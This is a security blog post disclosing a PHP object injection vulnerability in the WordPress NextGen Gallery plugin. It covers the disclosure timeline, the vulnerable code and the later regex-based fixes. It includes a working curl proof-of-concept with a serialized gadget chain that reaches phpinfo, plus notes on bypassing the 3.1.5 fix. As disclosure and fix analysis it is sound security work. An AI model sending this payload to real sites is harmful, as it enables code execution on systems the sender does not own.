slavco
Feb 4 · 3 min read

Everyone who has ever dealt with image archiving and presentation in WordPress knows the NextGen Gallery plugin. It is the most popular plugin for any image-related WP use case, and with its ~1 million active installations it gets the attention of security people. A month ago I decided to report a vulnerability to them.


Disclosure process

I decided to report the weakness in the plugin code and started to search for a contact or something similar. Nothing public, nothing easy to find. I decided to go via plugins[at]wp[dot]org and it worked. I shared my concerns with the plugins team and the developers were reached. Quite fast a “fixed” version was released. This release was done without any check with me, so I wrote to the plugins team again. This time they pushed the developers to reach me, and it happened. They provided the fix (the current 3.1.6 version) and I gave my opinion about it, but I also asked for permission to write about it 2–3 weeks after the release.
Now, after 3 weeks, when most of the instances in the wild are updated (free and premium), the developers (the NextGen folks) agree that I’m free to write about the vulnerability.

Vulnerability in NextGen 3.1.4

I have written many times in the past that when using WP you should NOT use any unserialize approach other than the provided maybe_ functions, that you should call it only once, and that it should never run on raw input or on input that has been changed by other routines in the storage layer!

static function unserialize($value)
{
    ...
    if (strpos($retval, 'a:') === 0)
    {
        // errors silenced, then the (stripped) input goes straight into unserialize()
        $er = error_reporting(0);
        $retval = unserialize($value);
        error_reporting($er);
    }
    else {
        ...
    }
    return $retval;
}

Attack PoC

Besides the option to perform this type of attack via the meta table in WP, the plugin was vulnerable to direct unserialize of user input (in its client libraries there are many serialize calls :) ). So, with a low-privileged user (one who can manage / create albums), the following attack was possible:

curl 'http://local.target/wp-admin/admin.php?page=nggallery-manage-album&act_album=1' --data '_wpnonce=0576380f03&_wp_http_referer=%2Fwpm%2Fwp5rc%2Fwp-admin%2Fadmin.php%3Fpage%3Dnggallery-manage-album%26act_album%3D1&sortorder=gid%3Da:1:{i:0;O:15:"simple_html_dom":1:{s:5:"nodes";C:33:"Requests_Utility_FilteredIterator":100:{x:i:0;a:3:{i:0;i:1;i:1;i:1;i:2;i:1;};m:a:1:{S:11:"\00\2A\00\63\61\6C\6C\62\61\63\6B";s:7:"phpinfo";}}}}&act_album=1&update=Update' --compressed

Vulnerability fix in NextGen 3.1.5

The fix was introduced in the following way:

if (self::check_for_serialized_objects($value))
    throw new Exception(__("NextGen Gallery will not unserialize data with objects", 'nextgen_gallery'));

and in this method we have the following:

public static function check_for_serialized_objects($string)
{
    if (!is_string($string))
        return false;
    $string = trim($string);
    return (bool)preg_match("/O:[0-9]+:/is", $string);
}

But is it fixed? Check this + the method bypass here :)

Vulnerability fix in NextGen 3.1.6

public static function check_for_serialized_objects($string)
{
    if (!is_string($string))
        return false;
    $string = trim($string);
    return (bool)preg_match("/(O|C):\+?[0-9]+:/is", $string);
}
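As an added illustration (not NextGen Gallery code), here are the 3.1.5 and 3.1.6 checks quoted above placed side by side and run over constructed serialized strings, showing which forms the first regex misses (the `C:` custom-serialization form used in the PoC, and a `+` sign before the length, which PHP's unserializer tolerates). The class name `SomeType` is made up for the sample; the last function shows the regex-free alternative PHP 7.0+ offers via the `allowed_classes` option of unserialize().

```php
<?php
// Added example: the two check_for_serialized_objects() variants from the post,
// reduced to their regex, plus a regex-free defence. Not the plugin's own code.

function check_3_1_5(string $s): bool
{
    return (bool)preg_match("/O:[0-9]+:/is", trim($s));
}

function check_3_1_6(string $s): bool
{
    return (bool)preg_match("/(O|C):\+?[0-9]+:/is", trim($s));
}

// Defence that does not depend on a denylist regex (PHP >= 7.0): with
// allowed_classes => false no class is instantiated at all; any object entry
// comes back as a __PHP_Incomplete_Class instance instead.
function unserialize_no_objects(string $s)
{
    return unserialize($s, ['allowed_classes' => false]);
}

// Constructed samples; "SomeType" is a placeholder class name, not a gadget.
$samples = [
    'plain array'        => 'a:1:{i:0;s:3:"gid";}',
    'object (O:)'        => 'O:8:"stdClass":0:{}',
    'custom object (C:)' => 'C:8:"SomeType":0:{}',  // Serializable form, as in the PoC
    'plus-sign length'   => 'O:+8:"stdClass":0:{}', // leading + is accepted by unserialize()
];

foreach ($samples as $label => $s) {
    printf("%-20s 3.1.5 blocks: %-4s 3.1.6 blocks: %s\n",
        $label,
        check_3_1_5($s) ? 'yes' : 'NO',
        check_3_1_6($s) ? 'yes' : 'NO');
}

// The option-based defence neutralises the O: case without any pattern matching.
$v = unserialize_no_objects('O:8:"stdClass":0:{}');
var_dump($v instanceof __PHP_Incomplete_Class);
```

Only the plain array passes both regex checks; the `C:` and `O:+` samples pass the 3.1.5 check and are caught only by the 3.1.6 pattern.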

This way we are somewhat assured that the fix is almost complete, but only on the latest PHP 7.2+ versions; the other versions remain vulnerable at least to DoS via this routine, and we have already seen how interesting that can be for WordPress.

Promo

If you are a WP developer, WP host provider or WP security product provider with a valuable list of clients, we offer a subscription list and we are exceptional (B2B only).

websec

Attack sources + web application security
